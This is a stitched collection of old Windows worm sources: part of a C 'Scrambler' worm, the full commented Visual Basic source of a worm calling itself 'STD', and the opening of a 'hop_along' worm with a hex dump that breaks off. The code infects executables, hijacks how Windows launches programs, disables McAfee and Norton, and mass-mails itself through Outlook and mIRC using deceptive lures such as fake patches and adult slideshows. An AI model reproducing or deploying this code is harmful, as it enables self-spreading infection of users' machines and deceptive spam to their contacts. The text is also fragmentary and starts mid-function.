ScriptFile();
fclose(scrambler);
}

scrambler = fopen("f:\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

scrambler = fopen("f:\\PROGRA~1\\mirc\\script.ini","wt");
if(scrambler)
{
ScriptFile();
fclose(scrambler);
}

strcpy(RepairHost, Buffer);
strcat(RepairHost, "\\system\\hostfile.exe");
CopyOrig(Virus, RepairHost);

strcpy(ScramFile, Buffer);
strcat(ScramFile, "\\system\\scram.sys");
if(FileExists(ScramFile) == false)
HDDSearch("c:");

strcpy(WinScript, Buffer);
strcat(WinScript, "\\wscript.exe");

if(FileExists(WinScript))
{
if(FileExists("scram.sys") == false)
{
scrambler = fopen("scrambler.vbs","wt");
if(scrambler)
{
fprintf(scrambler,"On Error Resume Next\n");
fprintf(scrambler,"Dim scrambler, Mail, Counter, A, B, C, D, E, F\n");
fprintf(scrambler,"Set scrambler = CreateObject(%coutlook.application%c)\n",
34, 34);
fprintf(scrambler,"Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n", 34, 34);
fprintf(scrambler,"For A = 1 To Mail.AddressLists.Count\n");
fprintf(scrambler,"Set B = Mail.AddressLists(A)\n");
fprintf(scrambler,"Counter = 1\n");
fprintf(scrambler,"Set C = scrambler.CreateItem(0)\n");
fprintf(scrambler,"For D = 1 To B.AddressEntries.Count\n");
fprintf(scrambler,"E = B.AddressEntries(Counter)\n");
fprintf(scrambler,"C.Recipients.Add E\n");
fprintf(scrambler,"Counter = Counter + 1\n");
fprintf(scrambler,"If Counter > 90 Then Exit For\n");
fprintf(scrambler,"Next\n");
fprintf(scrambler,"C.Subject = %cCheck this out, it's funny!%c\n", 34, 34);
fprintf(scrambler,"C.Attachments.Add %c%s%csystem%c%s%c\n", 34, Buffer, 92,
92, CopyName, 34);
fprintf(scrambler,"C.DeleteAfterSubmit = True\n");
fprintf(scrambler,"C.Send\n");
fprintf(scrambler,"E = %c%c\n", 34, 34);
fprintf(scrambler,"Next\n");
fprintf(scrambler,"Set F = CreateObject(%cScripting.FileSystemObject%c)\n",
34, 34);
fprintf(scrambler,"F.DeleteFile Wscript.ScriptFullName\n");
fclose(scrambler);
}
ShellExecute(NULL, "open", "scrambler.vbs", NULL, NULL, SW_SHOWNORMAL);
}
}

_chdir(Buffer);
scrambler = fopen("winstart.bat", "wt");
if(scrambler)
{
fprintf(scrambler,"@cls\n");
fprintf(scrambler,"@echo Today..\n");
fprintf(scrambler,"@echo I'm going to scramble your mind..\n");
}
fclose(scrambler);

scrambler = fopen(ScramFile, "wt");


if(scrambler)
{
fprintf(scrambler, "Scrambler\n");
fprintf(scrambler, "by Gigabyte\n");
fclose(scrambler);
}

_chdir("system");

if(FileExists(RepairHost))
WinExec(RepairHost, SW_SHOWNORMAL);

_unlink("hostfile.exe");
}
Attribute VB_Name = "STD"
'STD v1.0 by Error of Team Necrosis
' Commented by Error, pardon my commenting style
' ********W32.HLLP.STD.worm Source*********
' STD is a Memory-Resident EXE prepender with
' Worm functions for Outlook and mIRC
Public myDNA, myRNA, MyCode, STD, Grime, MySTD As String
Public FDateTime, oldDate, FDate, OldTime, FTime As String
Const MySize = 17920
Const RSP_SIMPLE_SERVICE = 1
Const RSP_UNREGISTER_SERVICE = 0
Private iResult, hProg, idprog, iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const Notification = "Hey, sorry I haven't written to you in a while. " & _
"Well you could call it a while. I'm writing this E-mail " & _
"to let you know of an attachment im sending with the next mail."
Const Notify = "Here is the e-mail attachment I told you about earlier, " & _
"It's an installation program for "
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long,
ByVal dwType As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal
bInheritHandle As Long, ByVal dwProcessID As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long,
lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Sub Form_Load()
' I put STD into a form because if you compile
' it into a module you wont be able to chose
' what default icon STD will have, and it ends
' up with a nasty baby blue and white form.
' Which is very noticable since STD's icon
' becomes the infected EXE's icon. i then made
' the MS-DOS Program Icon as the default icon

' NOTE: Make sure you make the form set to


' visbile = false and showintaskbar = false

On Error Resume Next


Dim process As Long
process = GetCurrentProcessId()
' This gets STD's process handle so it can
' manipulate itself
Call RegisterServiceProcess(process, RSP_SIMPLE_SERVICE)
' Now STD is hidden from ALT+CTRL+DEL and
' Task Manager. This will take up kernel
' processing up to 99.9% but it will allocate
' any needed kernel processing for other
' programs and still remain hidden.
Call AIDS
' AIDS = Registry Modifications to disable
' McAfee/Norton, have STD startup on windows
' load, make STD go memory-resident, and to
' modify mIRC scripting
myDNA = App.EXEName
If Right(App.Path, 1) <> "\" Then
myRNA = App.Path & "\"
End If
' The above will get the present filename of
' STD's host which has been executed
myRNA = myRNA & myDNA & ".exe"
' ************MEMORY-RESIDENT AREA***********
If UCase(myRNA) = "C:\WINDOWS\SYSTEM\SYSTRAY_.EXE" Then
' STD places its code into the file:
' C:\WINDOWS\SYSTEM\SYSTRAY_.EXE
' This is called the Exe-Hooker (yes i said
' hooker). Whenever a exe is executed this file
' will be executed first, sending the running
' exe's full pah name and parameters to this
' files commandline
STD = Command()
' Get the running exe's path name and parameters
For X = 1 To Len(STD)
strck = UCase(Mid(STD, X, 1))
Grime = Grime + strck
If Right(Grime, 5) = ".EXE " Then
' Extract the exe name from the parameters
Grime = Left(Grime, Len(Grime) - 1)
MySTD = Right$(STD, Len(STD) - X)
' Grime = full path of the running exe
' MySTD = all the exe's parameters
GoTo Trine
End If
Next X
Trine:
ff = FreeFile
' use freefiles so you dont get file i/o errors
FDateTime = FileDateTime(Grime)
' Get the files Date/Time Stamp
For w = 1 To Len(FDateTime)
Scan = Mid(FDateTime, w, 1)
If Scan = " " Then
FDate = FDate + Scan
' Extract the Time
FTime = Mid(FDateTime, w + 1, Len(FDateTime) - w)
GoTo GotStamp
End If
' Extract the Date
FDate = FDate + Scan
Next w
GotStamp:
oldDate = Date$
' Get and store the original system date
OldTime = Time$
' Get and store the original system time
Date = FDate
' Change the system Date to the files date
Time = FTime
' Change the system Time to the files time
' This will keep the file's date/time stamp
' preserved (Is this a first for a VB virus?)
Open Grime For Binary Access Read As ff
' Open the running exe
Dim Original As String
Original = Space(LOF(ff))
' set a buffer to include the entire exe file's
' contents (I've seen exe's 126 meg being stored
' as a string in VB)
Get #ff, 1, Original
' Start at the beginning of the file and get the
' entire contents of the file
If UCase(Right(Original, 3)) = "STD" Then
' After getting the contents, check to see if
' the last 3 characters in a file are "STD"
' if so, that means the file is already infected
' and the original file needs to be ran ASAP
Call Original_Jump
' Original_Jump = run the original exe
End If
Close #ff
' if the file isnt infected:
Open myRNA For Binary Access Read As #2
' open the Exe hooker file
Dim Herpes As String
Herpes = Space(MySize)
Get #2, 1, Herpes
' Get the virus from the file
Close #2
Open Grime For Binary Access Write As ff
Put #ff, 1, Herpes
' Place the virus at the beginning of the Exe
Put #ff, MySize, Original
' Right after STD, place the original Exe code
Put #ff, LOF(ff) + 3, "STD"
' Mark the file infected with "STD" as the last
' 3 characters in a file
Close #ff
Call Original_Jump
' Run the original exe
End If
' ********END OF MEMORY-RESIDENT CODE*********
InFx_SYS
' InFx_SYS starts the infection of the system
' and makes STD go resident
End Sub
Public Sub InFx_SYS()
On Error Resume Next
Kill "C:\windows\system\systray_.exe"
' Kill any non-working installations
ff = FreeFile
Open myRNA For Binary Access Read As #ff
' Open the running file
Dim MyCode As String
MyCode = Space(MySize)
Get #ff, 1, MyCode
' Extract STD from the file
Close
Open "C:\windows\system\systray_.exe" For Binary Access Write As #ff
Put #ff, 1, MyCode
' Place STD in the Exe Hooker file
Put #ff, LOF(ff) + 3, "STD"
' Mark the file infected so it wont infect
' itself
Close
FileCopy "C:\windows\system\systray_.exe", "C:\windows\system\runtray_.dll"
' copy the Exe Hooker file to another file for
' mailing purposes
Call Original_Jump
' Run the original exe
End Sub
Public Sub AIDS()
' This modifies windows registry, disables AV
' products and mIRC sending stuff
' NOTE: this is ran every exe execution as well
On Error Resume Next
w = Chr(34)
' for saving space (And lots of it)
Open "C:\ModReg.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[HKEY_CLASSES_ROOT\exefile\shell\open\command]"
Print #1, "@=" & w & "\" & w & "C:\\windows\\system\\systray_.exe\" & w & " %1 %*" & w
' Most important command of STD is above
' This forces Windows to run all exe's through
' STD's Exe Hooker file along with their
' parameters. Once windows is restarted after
' system infection, STD will go into hardend
' residency. Windows will depend on the Exe
' Hooker to run all exe's and therefore STD
' cannot be deleted in a windows session. And
' if they delete it in DOS, no exes will run
' until the rewrite the registry
Print #1,
Print #1, "[HKEY_LOCAL_MACHINE\Software\McAfee\Scan95]"
Print #1, w & "SerialNum" & w & "=" & w & "STD v1.0 by Error of TN" & w
Print #1, w & "CurrentVersionNumber" & w & "=" & w & "666" & w
Print #1, w & "DAT" & w & "=" & w & "NONE" & w
Print #1, w & "DATFile" & w & "=" & w & "-2000" & w
Print #1, w & "VirusInfoURL" & w & "=" & w & "http://www.norton.com" & w
Print #1, w & "bVShieldEnabled" & w & "=dword:00000000"
' Disable McAfee's scanner, DAT files, and
' VShield
Print #1,
Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"
Print #1, w & "SystemTray" & w & "=" & w & "C:\\Windows\\system\\systray_.exe" & w
' Start STD on every windows startup
Close #1
If Dir("C:\mirc", vbDirectory) <> "" Then
Open "C:\mirc\script.ini" For Output As #1
' Modify script.ini for STD sending
Print #1, "[script]"
Print #1, "n0= on 1:TEXT:*sex*:#:{"
' Everytime someone types in sex, sexy, etc
' in a Channel...
Print #1, "n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky
adult slideshow and was wondering if you would like a copy. So I'm going to send you one."
' STD will message them with this...
Print #1, "n2= .copy C:\windows\system\runtray_.dll
C:\windows\system\install_show.exe"
' rename the mailing file to this false name
Print #1, "n3= .dcc send $nick C:\windows\system\install_show.exe"
' and DCC send it to the person who typed in sex
' BTW 'sex' is the 2nd most common subject/word
' typed in chats (right after a/s/l)
Print #1, "n4= }"
' end the mIRC sending stuff
Close
End If
modify = Shell("regedit /s C:\ModReg.reg", vbHide)
' run the Registry modifications in a background
' process
Kill "C:\ModReg.reg"
' delete any of its traces
Kill "C:\Program Files\Norton AntiVirus\*.dat"
' delete Norton's DAT files
End Sub
Public Function IGotWyrms(Subject1 As String, Body1 As String, Optional Attachment1 As String)
On Error Resume Next
' MAPI Mailing technique got from my other virus
' W97M/Revolution
' http://teamnecrosis.20m.com/VC.html for stuff
Dim S_and_M, B_and_D, Spawnme
Set S_and_M = CreateObject("Outlook.Application")
Set B_and_D = S_and_M.GetNameSpace("MAPI")
If S_and_M = "Outlook" Then
B_and_D.Logon "Guest", "password"
For y = 1 To B_and_D.AddressLists.Count
' get # of addybooks in Outlook
Set AddyBook = B_and_D.AddressLists(y)
X = 1
Set Spawnme = S_and_M.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
peep = AddyBook.AddressEntries(X)
Spawnme.Recipients.Add peep
X = X + 1
If X > 100 Then oo = AddyBook.AddressEntries.Count
' in each Addybook send STD to the first 100 ppl
Next oo
Spawnme.Subject = Subject1
' Subject1 = "Hey" (on authorization mail) or
' "Here it is" (on Attachment mail)
Spawnme.Body = Body1
' the body varies.... see Original_Jump
If Attachment1 <> "" Then
Spawnme.Attachments.Add Attachment1
' as above
End If
Spawnme.Send
peep = ""
Next y
B_and_D.Logoff
End If
End Function
Public Sub Original_Jump()
On Error Resume Next
If Grime = "" Or Grime = Empty Then Grime = myRNA
' make sure STD gets the file to run
If Original = "" Or Original = Empty Then
Open Grime For Binary Access Read As #3
Original = LOF(3) - MySize
If Original = 0 Then End
' if the file = pure source of STD then end
Dim GetOrig As String
GetOrig = Space(Original)
Get #3, MySize, GetOrig
' get the original code of the running exe
Close #3
End If
hideit = Left(Grime, Len(Grime) - 4)
hideit = hideit & ".vxv"
Open hideit For Binary Access Write As #10
Put #10, , GetOrig
' place the code in a temporary file with the
' same exe name but ".vxv" extension
Close #10
Close
Dim idprog As Long
Date = oldDate
Time = OldTime
' Restore system date/time if needed
idprog = Shell(hideit & " " & MySTD, vbNormalFocus)
' run the original exe AND its parameters via
' running the original code from a temporary
' file
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idprog)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
' monitor the running exe from the temp file
' and have STD remain resident using 2K bytes
' of memory to run. This is what prohibits
' STD from being deleted in a Windows session
' along with windows requiring that file
Loop
Kill hideit
Kill hideit
' As soon as the program has ended delete the
' temp file (2 times to ensure deletion)
Randomize Timer
' Base random number gen on the time
RandSend = Int(Rnd(1) * 20) + 1
If RandSend = 5 Then

' NOTE: to view mail messages see the


' declarations at the top of STD's code

' STD will send itself via Outlook 1 out of 20


' exe executions upon the infected machine
Call IGotWyrms("Hey", Notification, "")
' send the authorization mail telling all users
' that the next E-mail will have an attachment
' "Social engineering at its finest" - Evul
Name "C:\windows\system\runtray_.dll" As "C:\windows\install_.exe"
' rename the mail file to a fake name
Randomize Timer
Dim Note As String
randmsg = Int(Rnd(1) * 5) + 1
If randmsg = 1 Then Note = Notify & "an adult screensaver slideshow program"
If randmsg = 2 Then Note = Notify & "an Outlook Service Release upgrade"
If randmsg = 3 Then Note = Notify & "a Microsoft Explorer Patch"
If randmsg = 4 Then Note = Notify & "a Desktop Game I got off the internet"
If randmsg = 5 Then Note = Notify & "a brand-new MP3 player and plug-ins"
Call IGotWyrms("Here it is", Note, "C:\windows\install_.exe")
' STD will send itself disguised as one of the
' above programs
Name "C:\windows\install_.exe" As "C:\windows\system\runtray_.dll"
' rename the fake exe to the original fake name
End If
End If
End
' End STD
' W32.HLLP.STD.worm by Error of Team Necrosis
' 32-bit exe infector/worm with a hint of social
' engineering
' One of the first Memory-Resident Exe infectors
' written in Visual Basic
' questions? ---> FatalError@ghostmail.com
' http://teamnecrosis.20m.com
End Sub
Private Sub Form_Load()
If Dir("c:\windows\hop_along.exe") = "" Then ' check if already infected
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\hop_along.exe"
CreateVBS ' call the Create VBS sub
Shell "wscript.exe c:\windows\hop_along.vbs" ' Run the VBS script
CreatePKunzip ' Call the CreatePKunzip sub
LogoZip ' Call the LogoZip sub
CreateBat ' Call the CreateBat sub
Shell "c:\windows\hop_along.bat", vbHide ' Run the bat
Wait4Bat ' Run the Wait4Bat Loop till bat is completed running
FileCopy "c:\windows\logo.sys", "c:\logo.sys" 'Copy Logo file to c:\
End If
End
End Sub

Public Sub CreateVBS()


Open "c:\windows\hop_along.vbs" For Output As #1
Print #1, "Set createmail = CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")"
Print #1, " If createmail <> " & Chr(34) & "" & Chr(34) & " Then"
Print #1, " Set EachMail = createmail.GetNameSpace(" & Chr(34) & "MAPI" & Chr(34) & ")"
Print #1, " For Each GetEmail In EachMail.AddressLists"
Print #1, " If GetEmail.AddressEntries.Count > 0 Then"
Print #1, " Set Eletter = createmail.CreateItem(0)"
Print #1, " For VecH = 1 To GetEmail.AddressEntries.Count"
Print #1, " Set FloP = GetEmail.AddressEntries(VecH)"
Print #1, " If VecH = 1 Then"
Print #1, " Eletter.BCC = FloP.Address"
Print #1, " Else"
Print #1, " Eletter.BCC = Eletter.BCC & " & Chr(34) & "; " & Chr(34) & " & FloP.Address"
Print #1, " End If"
Print #1, " Next"
Print #1, " Eletter.Subject = " & Chr(34) & "Look At This!!!" & Chr(34); ""
Print #1, " Eletter.Body = " & Chr(34) & "You have to see this file its so funny!" & Chr(34);
""
Print #1, " Eletter.Attachments.Add " & Chr(34) & "C:\windows\hop_along.exe" & Chr(34); ""
Print #1, " Eletter.DeleteAfterSubmit = True"
Print #1, " Eletter.Send"
Print #1, " End If"
Print #1, " Next"
Print #1, "End If"
Close #1
End Sub

Sub CreatePKunzip()
Open "c:\windows\pkunzip.dbg" For Output As #2
Print #2, "N PKUNZIP.COM"
Print #2, "E 0100 B9 2E B9 BF BE 0B 2B CF 32 C0 F3 AA B4 30 CD 21"
Print #2, "E 0110 A3 22 B9 8D A5 00 06 89 26 26 B9 B8 C6 09 E8 50"
Print #2, "E 0120 00 E8 C0 01 B8 4B 0A E8 31 00 B8 62 A9 E8 2B 00"
Print #2, "E 0130 E8 61 00 E8 3E 00 A0 20 B9 E9 0E 00 BB 65 0A 50"
Print #2, "E 0140 53 92 E8 34 00 58 E8 28 00 58 B4 4C CD 21 C6 06"
Print #2, "E 0150 20 B9 01 50 B8 5B 0A E8 1F 00 58 E8 88 02 8B F0"
Print #2, "E 0160 E8 23 00 8B 1E BC 0B 8B D6 91 B4 40 CD 21 E9 82"
Print #2, "E 0170 02 E8 E7 FF B8 48 0A EB E2 50 E8 F7 FF B8 3E 0A"
Print #2, "E 0180 E8 D8 FF 58 EB D5 56 96 BA FF FF AC 42 84 C0 75"
Print #2, "E 0190 FA 92 5E C3 E8 4F 02 33 C9 33 D2 88 0E 2A AA 8B"
Print #2, "E 01A0 1E 28 B9 B8 02 42 CD 21 8B F0 85 D2 75 05 3D 00"
Print #2, "E 01B0 10 72 03 BE 00 10 2B C6 83 DA 00 95 8B FA 83 EE"
Print #2, "E 01C0 12 8B D5 8B CF E8 EF 00 BA 00 0E 8D 4C 12 E8 EC"
Print #2, "E 01D0 00 8B CE C7 06 68 0A 05 06 B8 66 0A E8 A3 00 85"
Print #2, "E 01E0 C0 75 1F 8B C5 0B C7 74 11 81 ED EA 0F 83 DF 00"
Print #2, "E 01F0 7D CF 03 F5 33 ED 33 FF EB C7 B0 03 BA 6A 0A E9"
Print #2, "E 0200 3A FF 97 8B 4D 14 E3 31 56 8D 75 16 33 DB AC 3C"
Print #2, "E 0210 1B 74 0C 3C 13 75 03 43 EB 05 92 B4 02 CD 21 E2"
Print #2, "E 0220 ED 5E E8 4F FF 85 DB 74 10 B8 86 0A E8 99 00 72"
Print #2, "E 0230 05 B0 08 E9 14 FF E8 3B FF 8B 36 26 B9 8B 55 10"
Print #2, "E 0240 8B 4D 12 E8 71 00 83 7D 0E 00 75 2E 8B 4D 0C A1"
Print #2, "E 0250 06 00 2B C6 3B C1 72 22 8B D6 E8 60 00 8B 4D 0A"
Print #2, "E 0260 E3 15 8B 5C 1C 8B 54 1E 8D 78 2E 03 FA 03 7C 20"
Print #2, "E 0270 E8 B2 01 8B F7 E2 EB E9 79 01 B0 07 BA B5 0A E9"
Print #2, "E 0280 BA FE E8 61 01 96 33 C0 A3 D6 AE E3 24 8B FA AD"
Print #2, "E 0290 47 4F AF E0 FC 83 F9 01 76 17 A7 74 06 4F 4F 4E"
Print #2, "E 02A0 4E EB EE 8D 5D FC 89 1E D6 AE 80 3E 2A AA 00 74"
Print #2, "E 02B0 EC A1 D6 AE E9 3C 01 53 B8 00 42 EB 03 53 B4 3F"
Print #2, "E 02C0 8B 1E 28 B9 CD 21 5B C3 E8 90 FE B8 08 0C CD 21"
Print #2, "E 02D0 24 DF 3C 59 74 04 3C 4E 75 F1 92 B4 02 CD 21 80"
Print #2, "E 02E0 EA 4F F5 C3 E8 D5 00 BE 81 00 8A 4C FF 32 ED E3"
Print #2, "E 02F0 1E AC 3C 20 74 17 3C 09 74 13 3C 2D 75 6D AC 49"
Print #2, "E 0300 74 0D 3C 6F 74 04 3C 4F 75 03 A2 FC A9 E2 E2 80"
Print #2, "E 0310 3E 24 B9 00 74 34 BE 62 A9 33 DB AC 3C 2E 75 01"
Print #2, "E 0320 43 84 C0 75 F6 85 DB 75 0A C7 44 FF 2E 5A C7 44"
Print #2, "E 0330 01 49 50 BA 62 A9 B8 00 3D 80 3E 22 B9 03 72 02"
Print #2, "E 0340 B0 20 CD 21 A3 28 B9 72 09 C3 BA D1 0A B0 02 E9"
Print #2, "E 0350 EA FD BA C4 0A BB 62 A9 B0 02 E9 E2 FD AC 3C 20"
Print #2, "E 0360 74 90 3C 09 74 8C AA E2 F4 EB A4 80 3E 24 B9 00"
Print #2, "E 0370 75 08 BF 62 A9 A2 24 B9 EB 03 BF E0 AE AA EB E7"
Print #2, "E 0380 E8 63 00 8B F2 8B E9 8B 0E 2A B9 8B 16 2C B9 BF"
Print #2, "E 0390 BC AA FC 33 C0 45 EB 16 AC 8B D8 32 D9 8A CD 8A"
Print #2, "E 03A0 EA 8A D6 8A F7 D1 E3 D1 E3 33 09 33 51 02 4D 75"
Print #2, "E 03B0 E7 89 0E 2A B9 89 16 2C B9 E9 37 00 E8 27 00 FD"
Print #2, "E 03C0 BF BA AE BD FF 00 B9 08 00 8B D5 33 C0 D1 E8 D1"
Print #2, "E 03D0 DA 73 07 81 F2 20 83 35 B8 ED E2 F1 AB 92 AB 4D"
Print #2, "E 03E0 79 E4 FC E9 0D 00 8F 06 D2 AE 55 56 57 53 51 FF"
Print #2, "E 03F0 26 D2 AE 59 5B 5F 5E 5D C3 50 56 57 97 8B F2 AC"
Print #2, "E 0400 AA 84 C0 75 FA 5F 5E 58 C3 52 56 8B F0 E8 76 FD"
Print #2, "E 0410 03 C6 5E 5A EB E3 B8 05 0B E8 32 FD B8 7C AA E8"
Print #2, "E 0420 39 FD E9 CE FF E8 BE FF E8 E3 00 8A 44 0A 3C 08"
Print #2, "E 0430 74 04 84 C0 75 E0 03 D3 83 C2 1E 33 C9 03 54 2A"
Print #2, "E 0440 13 4C 2C E8 71 FE E8 54 00 85 C0 74 4D E8 24 FD"
Print #2, "E 0450 B8 FF FF A3 2A B9 A3 2C B9 8B 44 0A 48 78 05 E8"
Print #2, "E 0460 FB 00 EB 03 E8 BA 00 A1 2A B9 8B 16 2C B9 F7 D0"
Print #2, "E 0470 F7 D2 2B 44 10 1B 54 12 0B C2 74 0B B8 52 0B E8"
Print #2, "E 0480 CC FC C6 06 20 B9 01 8B 1E D0 AE 8B 4C 0C 8B 54"
Print #2, "E 0490 0E B8 01 57 CD 21 B4 3E CD 21 E9 56 FF E8 46 FF"
Print #2, "E 04A0 BF 7C AA 8B CB 03 FB 4F FD B0 2F F2 AE 75 01 47"
Print #2, "E 04B0 47 FC B8 2C AA BA E0 AE E8 3E FF 50 8B D7 E8 48"
Print #2, "E 04C0 FF 58 80 3E FC A9 00 75 29 50 BA FE A9 B4 1A CD"
Print #2, "E 04D0 21 5A B4 4E B9 07 00 CD 21 72 17 B8 00 43 CD 21"
Print #2, "E 04E0 72 10 92 E8 68 FC B8 26 0B E8 DC FD 72 04 33 C0"
Print #2, "E 04F0 EB 19 B9 20 00 B4 3C BA 2C AA CD 21 73 0A 8B DA"
Print #2, "E 0500 BA 43 0B B0 05 E9 37 FC A3 D0 AE E9 E5 FE E8 D5"
Print #2, "E 0510 FE BF 7C AA 8D 74 2E 8B CB F3 A4 32 C0 AA E9 D2"
Print #2, "E 0520 FE E8 C2 FE B8 67 0B E8 31 FC B8 2C AA E8 2B FC"
Print #2, "E 0530 B9 62 9B 8B 7C 14 8B 74 16 85 F6 75 06 3B CF 72"
Print #2, "E 0540 02 8B CF BA 00 0E 52 E8 73 FD 5A 85 C0 74 0B 2B"
Print #2, "E 0550 F8 83 DE 00 91 E8 47 04 EB DF E9 96 FE E8 86 FE"
Print #2, "E 0560 B8 74 0B E8 F5 FB B8 2C AA E8 EF FB E8 30 00 E9"
Print #2, "E 0570 81 FE 80 FD 08 74 05 8A CD E8 F4 00 8B CA AD 33"
Print #2, "E 0580 C2 40 74 03 E9 C3 02 A4 81 FF 00 9E 72 03 E8 F9"
Print #2, "E 0590 03 81 FE 20 B7 72 03 E8 C4 00 E2 EB 58 EB 0B C6"
Print #2, "E 05A0 06 DE AE 00 E8 B7 00 BF 00 0E B5 08 AD 92 80 3E"
Print #2, "E 05B0 DE AE 00 75 57 E8 8E 00 D0 16 DE AE E8 95 01 E8"
Print #2, "E 05C0 C2 00 84 E4 75 0C AA 81 FF 00 9E 72 F2 E8 BA 03"
Print #2, "E 05D0 EB ED 3D 00 01 74 D7 2D FE 00 50 E8 0D 01 91 59"
Print #2, "E 05E0 56 8D 75 FF 2B F3 72 06 81 FE 00 0E 73 18 BB 00"
Print #2, "E 05F0 0E 2B DE 03 36 DC AE 3B D9 73 0B 87 D9 2B D9 F3"
Print #2, "E 0600 A4 BE 00 0E 87 D9 F3 A4 5E 91 EB BB 8B CF BA 00"
Print #2, "E 0610 0E 2B CA E8 89 03 C3 80 F9 08 77 12 53 33 C0 33"
Print #2, "E 0620 DB 8A D9 8A 87 A8 0B 22 C2 E8 44 00 5B C3 53 33"
Print #2, "E 0630 DB 8A D9 B1 08 2A D9 E8 E2 FF 8A CB 8A D8 E8 DB"
Print #2, "E 0640 FF 0A F8 93 5B C3 D1 EA FE CD 74 01 C3 9C 81 FE"
Print #2, "E 0650 20 B7 72 03 E8 07 00 8A 34 46 B5 08 9D C3 50 51"
Print #2, "E 0660 52 B9 00 08 BA 20 AF 8B F2 E8 51 FC 5A 59 58 C3"
Print #2, "E 0670 2A E9 77 0D F6 DD 2A CD D3 EA 8A CD E8 CE FF 2A"
Print #2, "E 0680 E9 D3 EA C3 8A DA 32 FF D1 E3 8B 9F 62 A0 85 DB"
Print #2, "E 0690 78 0E 8A 8F 02 9F E8 D7 FF 93 3D 09 01 73 09 C3"
Print #2, "E 06A0 B8 62 A4 E8 26 00 EB EE 3D 1D 01 74 1B 2D 01 01"
Print #2, "E 06B0 8A C8 D0 E9 D0 E9 49 25 03 00 04 04 D3 E0 05 01"
Print #2, "E 06C0 01 93 E8 52 FF 03 C3 C3 B8 00 02 C3 B1 08 E8 9F"
Print #2, "E 06D0 FF 56 96 8A C2 32 C9 F7 D3 FE C1 D1 EB D1 E8 D1"
Print #2, "E 06E0 D3 D1 E3 8B 18 85 DB 78 EE 5E C3 8A DA 32 FF D1"
Print #2, "E 06F0 E3 8B 9F 62 A2 85 DB 78 1F 8A 8F 42 A0 E8 70 FF"
Print #2, "E 0700 80 FB 04 72 12 93 8A C8 D0 E9 49 24 01 04 02 D3"
Print #2, "E 0710 E0 93 E8 02 FF 03 D8 C3 B8 E2 A8 E8 AE FF EB DD"
Print #2, "E 0720 56 51 BF 02 9F B9 90 00 B0 08 F3 AA B1 70 FE C0"
Print #2, "E 0730 F3 AA B1 18 B0 07 F3 AA B1 08 FE C0 F3 AA BF 42"
Print #2, "E 0740 A0 B1 20 89 0E FA A9 B0 05 F3 AA C7 06 D4 AE 20"
Print #2, "E 0750 01 E9 D4 00 B1 02 E8 BE FE 48 79 03 E9 13 FE 57"
Print #2, "E 0760 74 BE 48 74 03 E9 E2 00 B1 05 E8 AA FE 05 01 01"
Print #2, "E 0770 A3 D4 AE B1 05 E8 9F FE 40 A3 FA A9 51 BF BC AE"
Print #2, "E 0780 B9 13 00 32 C0 F3 AA 59 B1 04 E8 8A FE 05 04 00"
Print #2, "E 0790 BF 96 0B 8B EF 03 E8 33 DB B1 03 E8 79 FE 8A 1D"
Print #2, "E 07A0 88 87 BC AE 47 3B FD 72 F0 56 51 BF 20 B7 BE BC"
Print #2, "E 07B0 AE B8 13 00 E8 9B 00 59 5E 8B 2E D4 AE 03 2E FA"
Print #2, "E 07C0 A9 BF 02 9F 32 FF 8A DA D1 E3 8B 9F 20 B7 8A 8F"
Print #2, "E 07D0 BC AE E8 9B FE 8A C3 3C 10 73 06 AA 4D 75 E5 EB"
Print #2, "E 07E0 35 77 0C B1 02 E8 2F FE 04 03 8A 4D FF EB 17 3C"
Print #2, "E 07F0 11 77 09 B1 03 E8 1F FE 04 03 EB 08 B1 07 E8 16"
Print #2, "E 0800 FE 05 0B 00 32 C9 51 86 C1 32 ED 2B E9 72 3B F3"
Print #2, "E 0810 AA 59 85 ED 75 AE 56 51 BE 02 9F BF 42 A0 03 36"
Print #2, "E 0820 D4 AE 8B 0E FA A9 F3 A4 A1 D4 AE BE 02 9F BF 62"
Print #2, "E 0830 A0 BD 62 A4 E8 1B 00 A1 FA A9 BE 42 A0 BF 62 A2"
Print #2, "E 0840 BD E2 A8 E8 0C 00 59 5E 5F C3 BA 81 0B B0 04 E9"
Print #2, "E 0850 EA F8 85 C0 74 F3 52 A3 D6 A9 89 3E D8 AE BF D8"
Print #2, "E 0860 A9 57 B9 10 00 33 C0 F3 AB 5F 56 8B 0E D6 A9 33"
Print #2, "E 0870 DB AC 8A D8 D1 E3 FF 01 E2 F7 BE B2 A9 BB 02 00"
Print #2, "E 0880 33 C0 89 00 B1 0F 03 87 D8 A9 D1 E0 43 43 89 00"
Print #2, "E 0890 E2 F4 83 38 00 74 12 BE DA A9 B9 0F 00 33 DB AD"
Print #2, "E 08A0 03 D8 E2 FB 83 FB 01 77 A1 5E 56 8B 0E D6 A9 BF"
Print #2, "E 08B0 C0 0B AC 32 E4 85 C0 74 0E 8B D8 D1 E3 8B 87 B2"
Print #2, "E 08C0 A9 40 89 87 B2 A9 48 AB E2 E8 5E 56 BF C0 0B 8B"
Print #2, "E 08D0 16 D6 A9 AC 8A C8 49 78 17 74 15 8B 1D 33 C0 D1"
Print #2, "E 08E0 EB D1 D0 E0 FA 41 D1 EB D3 D0 AB 4A 75 E5 EB 07"
Print #2, "E 08F0 47 47 33 C9 4A 75 DC 5E 8B 3E D8 AE B9 00 01 33"
Print #2, "E 0900 C0 F3 AB BF C0 0B 8B 16 D6 A9 A3 D6 A9 4A 03 F2"
